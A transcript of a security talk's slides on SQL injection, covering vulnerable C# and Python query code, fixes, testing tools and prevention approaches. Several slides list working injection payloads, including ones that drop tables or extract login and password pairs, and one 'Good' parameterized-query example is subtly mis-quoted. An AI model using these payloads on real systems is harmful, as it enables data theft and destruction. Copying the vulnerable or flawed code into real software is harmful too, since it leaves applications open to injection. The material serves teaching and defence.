Hack through Injections
-
Upload
nazar-tymoshyk -
Category
Technology
-
view
1.099 -
download
2
description
Transcript of Hack through Injections
![Page 1: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/1.jpg)
Hacking through Injections.
Theory and practice
By Nazar Tymoshyk, SoftServeOWASP-LVIV.blogspot.com
Specially for IT-Weekend Lviv
![Page 2: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/2.jpg)
Theory:
CODE problems
Impact
How to find
How to prevent
Practice:
Small hack
References
Training Lab
Agenda
![Page 3: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/3.jpg)
What do you see in this request?
GET /api/shop/discount?shopId=3&productId=1584&coupon=1y3z9 HTTP/1.1
Host: superdupershop.com
Cookie: ASP.NET_SessionId=10g5o4zjkmbd2i552d5j3255;.ASPXAUTH=f2d345118221742ee0316d4080a53af014eb8a3161db421d36aa6a86ffea6781b5584f4157ec85ae5956cfc54cc93c34a3f9449c8ef4c70b5b54d46e0def3677cce9a8105340b8ccc6c8e64dfa37ae953f987517
![Page 4: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/4.jpg)
Unauthorized database access by an external source using specially crafted code to piggyback on standard user input to bypass normal protections.
Why?
Gain access to restricted website areas
Query unauthorized data
Delete or corrupt data
What is SQL Injection? User accounts, credentials, and personal
information
Descriptions and prices of goods for sale
Orders, account statements, and payment
details
The privileges of each user within the
application
![Page 5: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/5.jpg)
This is a real problem and it’s dangerous
• DoS
• Data loss or corruption
• Data leakage
• Sometimes can lead to complete host takeover
• Reputation can be harmed.
![Page 7: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/7.jpg)
SQL-i
SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’
INJECT : admin’--
SELECT * FROM users WHERE username = ‘admin’ -- ’ AND password = ‘foo’
SELECT * FROM users WHERE username = ‘admin’
![Page 8: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/8.jpg)
Consequences
![Page 9: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/9.jpg)
![Page 10: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/10.jpg)
Training Lab• DVWA
• Gruyere
• WebGoat .Net
• WebGoat Java
• https://xss-game.appspot.com/
• OWASP Mutillidae II
• OWASP Broken Web Applications Project
• https://www.hacking-lab.com
![Page 11: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/11.jpg)
Aha, here is a source code for firsrequest
var shopId = Request["shopId"];
var productId = Request["productId"];
var coupon = Request["coupon"];
var couponPattern = string.Format("{0}-{1}-{2}", shopId, productId, coupon);
var sqlCommandTxt = string.Format(" SELECT value FROM Discounts WHERE
coupon LIKE {0}", coupon);
var cmd = new SqlCommand(sqlCommandTxt, dataConnection);
// Execute query, process result etc...
![Page 12: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/12.jpg)
Let’s Fix this code.
var shopId = Request["shopId"];
var productId = Request["productId"];
var coupon = Request["coupon"];
var couponPattern = string.Format("{0}-{1}-{2}", shopId, productId, coupon);
var cmd = new SqlCommand("SELECT * FROM Discounts WHERE coupon LIKE @couponPattern", dataConnection);
cmd.Parameters.Add(new SqlParameter("@couponPattern", couponPattern));
// Execute query, process result etc...
Is it fixed?
![Page 13: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/13.jpg)
Now it’s fixed
var shopId = 0;
if (!int.TryParse(Request["shopId"], out shopId))
{ throw new InvalidArgumentException();
}
var productId = 0;
if (!int.TryParse(Request["productId"], out productId))
{ throw new InvalidArgumentException();
}
var coupon = Request["coupon"];
if (!Regex.IsMatch(coupon, "^[A-Za-z0-9]{5}$"))
{ throw new InvalidArgumentException();
}
var couponPattern = string.Format("{0}-{1}-{2}", shopId, productId, coupon);
var cmd = new SqlCommand("SELECT * FROM Discounts WHERE coupon=@couponPattern", dataConnection);
cmd.Parameters.Add(new SqlParameter("@couponPattern", couponPattern));
// Execute query, process result etc...
![Page 14: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/14.jpg)
Python Code
import MySQLdb
def book_search_view(request):
if 'bookname' not in request.GET:
raise Http404
conn = MySQLdb.connect (host = "localhost", user = "testuser", passwd = "testpass", db ="test")
cursor = conn.cursor ()
name = request.GET['bookname']
cursor.execute ("SELECT * FROM table_books WHERE book_name = ‘%s’" % name)
row = cursor.fetchone ()
cursor.close ()
conn.close ()
return render_to_response('booklist.html', row, context_instance=RequestContext(request))
![Page 15: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/15.jpg)
A small problem
• Normal SQL • name=“Moby Dick”
SELECT * FROM table_books WHERE book_name = ‘Moby Dick’
• SQL Injection – bad day
• name=“1’; SELECT * from Users; --”
SELECT * FROM table_books WHERE book_name = ‘1’;
SELECT * from Users;
--’
• SQL Injection 2 – really bad day
• name=“1’; DROP TABLE Users; --”
SELECT * FROM table_books WHERE book_name = ‘1’;
DROP TABLE Users;
--’
![Page 16: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/16.jpg)
Java Code
![Page 17: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/17.jpg)
Detection Techniques
![Page 18: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/18.jpg)
TOOLS 1. sqlmap: automatic SQL injection and
database takeover tool
2. SQL Inject Me :: Add-ons for Firefox
3. Zed Attack Proxy
4. Burp Suite
5. W3AF
6. Wapiti
7. Havij Pro
8. Nikto
9. IronWASP
![Page 19: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/19.jpg)
DEMO 2
Testing security tools:
•SQL Map
•Burp Suite
![Page 20: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/20.jpg)
MANUAL Penetration Testing
• Error
• UnionIn-band
• Dns
• PingOut-band
• Sleep
• WaitforInferential
(Blind)
![Page 21: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/21.jpg)
This is old problem BLIND• sleep%281%29%2b1%29%20limit%201%20--
• sleep(1)+1) limit 1 --
• 1+and+sleep(10)--
• 1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='a',sleep(10),1)--
• 1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='2',sleep(10),1)--
• +OR+1=1--
• +union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns--
• +union+select+concat_ws(0x3a,id,login,password,name)+from+users--
• +union+select+concat_ws(0x3a,id,login,password,name)+from+users--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))--
![Page 22: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/22.jpg)
Typical examples of cases when an application needs to talk to a DB include:
The first step in this test is to understand when the application
interacts with a DB Server in order to access some data.
1. Authentication forms: when authentication is performed using a
web form, chances are that the user credentials are checked
against a database that contains all usernames and passwords (or,
better, password hashes).
2. Search engines: the string submitted by the user could be used in
a SQL query that extracts all relevant records from a database.
3. E-Commerce sites: the products and their characteristics (price,
description, availability, etc) are very likely to be stored in a
database.
![Page 23: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/23.jpg)
Prevention
![Page 24: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/24.jpg)
General approaches to SQL Injection Defense
Primary Defenses:Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Additional Defenses:Also Enforce: Least Privilege
Also Perform: White List Input Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
![Page 25: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/25.jpg)
Where to Learn more
• http://www.pluralsight.com/courses/web-security-owasp-top10-big-picture
• http://www.pluralsight.com/courses/owasp-top10-aspdotnet-application-security-risks
• http://www.irongeek.com/i.php?page=security/hackingillustrated
• http://google-gruyere.appspot.com/
• https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
![Page 26: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/26.jpg)
http://OWASP-LVIV.blogspot.com
![Page 27: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/27.jpg)
Thank you
Contact me:
Nazar Tymoshyk
Skype: root_nt
Gmail: [email protected] http://OWASP-LVIV.blogspot.com
![Page 28: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/28.jpg)
Blind SQL injections
http://site/?param=-1 OR 1=1http://site/?param=-1 OR 1=1--...http://site/?param=-1'http://site/?param=-1' AND 1=2...http://site/?param=-1' OR '1'='1...http://site/?param=-1"/*...http://site/?param=2http://site/?param=1http://site/?param=2-1...http://site/?param=1' AND 1=1http://site/?param=1' AND '1'='1
![Page 29: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/29.jpg)
Double Blind SQL-i
• http://site/?param=-1 AND benchmark(2000,md5(now()))
• ...
• http://site/?param=-1' AND benchmark(2000,md5(now()))--
![Page 30: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/30.jpg)
Escape User Input
• Hard to do right
• You’ll probably screw it up if you don’t cover all the cases• So don’t write your own regex
• MySQLdb.escape_string• Pro: Handles almost all encoding evasions
• Con: Error prone because it depends on humans to always use it
![Page 31: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/31.jpg)
import MySQLdb
def book_search_view(request):
if 'bookname' not in request.GET:
raise Http404
conn = MySQLdb.connect (host = "localhost", user = "testuser",
passwd = "testpass", db = "test")
cursor = conn.cursor ()
name = MySQLdb.escape_string(request.GET['bookname'] )
cursor.execute ("SELECT * FROM table_books WHERE book_name = ‘%s’" %name)
row = cursor.fetchone ()
cursor.close ()
conn.close ()
return render_to_response('booklist.html', row, context_instance=RequestContext(request))
![Page 32: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/32.jpg)
What does the escaped version look like?
• SQL Injection – bad day• name=“1’; SELECT * from Users; --”
SELECT * FROM table_books WHERE book_name = ‘1\’; SELECT * from Users; --’
• SQL Injection 2 – really bad day• name=“1’; DROP TABLE Users; --”
SELECT * FROM table_books WHERE book_name = ‘1\’;DROP TABLE Users; --’
![Page 33: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/33.jpg)
Evasion Techniques
http://www.f5.com/pdf/white-papers/sql-injection-detection-wp.pdf
![Page 34: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/34.jpg)
Even more Evasion Techniques
• Multibyte atttacks• http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
• http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
• Even the experts don’t get it right• MySQL patches bugs in their escaping routines
![Page 35: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/35.jpg)
White List
• Scrub data to a known set of inputs
• Pros• Works well for variables with limited range
• Fast
• Cons• Can only be used in customized locations
• Error prone• You might forgot
• Or the intern might not understand
• Example: user id must only contain 6 numbers
![Page 36: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/36.jpg)
Stored Procedures
• Use the inherent store procedure capabilities
• Pros• Forces parameterization of all user input
• Cons• Can still be bypassed if sql string is generated in code and passed to stored
procedure
• Not portable between databases
![Page 37: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/37.jpg)
Parameterized Queries
• Use DB API (mysqldb.execute) properly
• Use Django ORM
• Use SQLAlchemy (pylons, flask)• Really have to work hard to expose yourself
• Pros• Generally easier to model data
• Cons• ORMs sometimes limit advanced SQL
• Bottom line: use a framework!
![Page 38: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/38.jpg)
MySQLdb.execute
Bad:cursor.execute ("SELECT * FROM table_books WHERE book_name = ‘%s’" % name)
Good:cursor.execute ("SELECT * FROM table_books WHERE book_name = ‘%s’" , name)
Seriously?
Yes
![Page 39: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/39.jpg)
Thank you
Contact me:
Nazar Tymoshyk
Skype: root_nt
Gmail: [email protected] http://OWASP-LVIV.blogspot.com